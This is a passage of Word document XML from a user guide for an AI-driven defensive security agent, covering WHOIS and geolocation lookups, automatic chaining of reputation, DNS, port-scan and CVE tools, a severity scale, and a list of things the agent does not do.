        <w:t xml:space="preserve">Requires VIRUSTOTAL_API_KEY. The tool checks the hash only — no files are uploaded. Your files stay on your device.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="240" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">7. WHOIS LOOKUP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="180" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">7.1 What It Checks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180" w:before="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Retrieves registration and ownership information for domains and IP addresses from RDAP (Registration Data Access Protocol) and WHOIS registrars.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Information Retrieved</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Domain name and current status (active, clientTransferProhibited, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Registration date, expiration date, and last updated date</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Registrar name and IANA ID</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Nameservers (authoritative DNS)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Registrant organization and contact details (where not redacted by GDPR)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">For IPs: ASN (Autonomous System Number), network range, ISP/organization</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="180" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">7.2 Security Relevance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180" w:before="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">WHOIS data helps determine: if a domain was recently registered (common for phishing), if it's about to expire (potential hijacking), who owns a suspicious IP range, and whether the registrar is commonly abused by attackers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="240" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">8. IP GEOLOCATION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="180" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">8.1 What It Checks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180" w:before="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Maps an IP address to its approximate physical location using the ip-api.com geolocation service.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Information Retrieved</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Country, region/state, and city</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Latitude and longitude coordinates</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Timezone</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ISP (Internet Service Provider) name</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Organization name</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">AS number and name</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Whether the IP is a proxy/VPN/TOR exit node</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="180" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">8.2 Security Relevance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180" w:before="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Geolocation helps identify: login attempts from unusual countries (impossible travel detection), command-and-control server locations, whether an IP belongs to a cloud provider, VPN, or residential ISP, and geographic patterns in attack traffic.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="1565C0" w:sz="6" w:space="8"/>
        </w:pBdr>
        <w:spacing w:after="100" w:before="100"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1565C0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">INFO: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">IP geolocation is approximate (city-level accuracy). It should not be used as sole evidence for attribution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="240" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">9. AI-POWERED ANALYSIS (CHAT MODE)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="180" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">9.1 What It Does</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180" w:before="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Beyond the 12 individual tools, the agent's AI reasoning engine (Claude Sonnet) provides intelligent analysis by combining multiple tools in a single conversation. The agent can autonomously chain tools based on the user's query.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="180" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">9.2 Multi-Tool Chaining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User Query</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Tools the Agent Chains Automatically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"Investigate this IP: 45.33.32.156"</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 Reputation → Geolocation → Reverse DNS → Port Scan → WHOIS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"Is example.com safe?"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Domain Reputation → DNS Lookup → DNS Zone Security → WHOIS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if our server is vulnerable"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Scan → CVE Search (for each open service) → Risk Assessment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"Analyze this log file for attacks"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Log Analysis → IP Reputation (for top attacker IPs) → Geolocation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security audit of 10.0.0.1"</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Scan → DNS → WHOIS → CVE Search → Reputation → Report</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="180" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">9.3 Skills Library (762 Procedures)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180" w:before="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The agent has access to 762 cybersecurity skill procedures covering incident response playbooks, forensic analysis guides, threat hunting procedures, compliance checklists, and remediation steps. When a user query matches relevant skills, the agent automatically injects them as reference context for more accurate and detailed analysis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="180" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">9.4 Output Quality</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180" w:before="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Every response from the AI agent follows a structured format:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Summary of findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Detailed analysis with evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Risk assessment (CRITICAL / HIGH / MEDIUM / LOW)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK technique mapping where applicable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Actionable recommendations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Auto-generated HTML report (saved and shareable)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="240" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">10. SEVERITY CLASSIFICATION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180" w:before="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The agent uses a consistent 4-level severity scale across all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Severity</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CVSS Range</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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Meaning &amp; Response</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL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9.0 – 10.0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Immediate action required. Active exploitation likely. Isolate system, patch now, escalate to security team.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>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7.0 – 8.9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Urgent attention needed. Exploitable with moderate effort. Schedule emergency patch within 24–48 hours.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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val="false"/>
                <w:bCs w:val="false"/>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4.0 – 6.9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Should be addressed in normal patch cycle. Monitor for exploitation attempts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">LOW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0.1 – 3.9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Informational. Address during routine maintenance. Low risk of exploitation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="240" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">11. WHAT DOES NOT GET CHECKED</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180" w:before="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">For transparency, here is what the agent does NOT check or do:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">No file system scanning: the agent does not scan local files or directories for malware. Use a dedicated antivirus for that.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">No active exploitation: the agent never attempts to exploit vulnerabilities. It only performs reconnaissance and analysis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">No network traffic monitoring: the agent does not capture or analyze live network packets. Use Wireshark or Zeek for that.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">No endpoint detection (EDR): the agent does not monitor running processes, registry changes, or system calls.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">No email scanning: the agent does not scan email attachments or inbox content directly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">No wireless network auditing: no WiFi scanning, WPA cracking, or rogue AP detection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
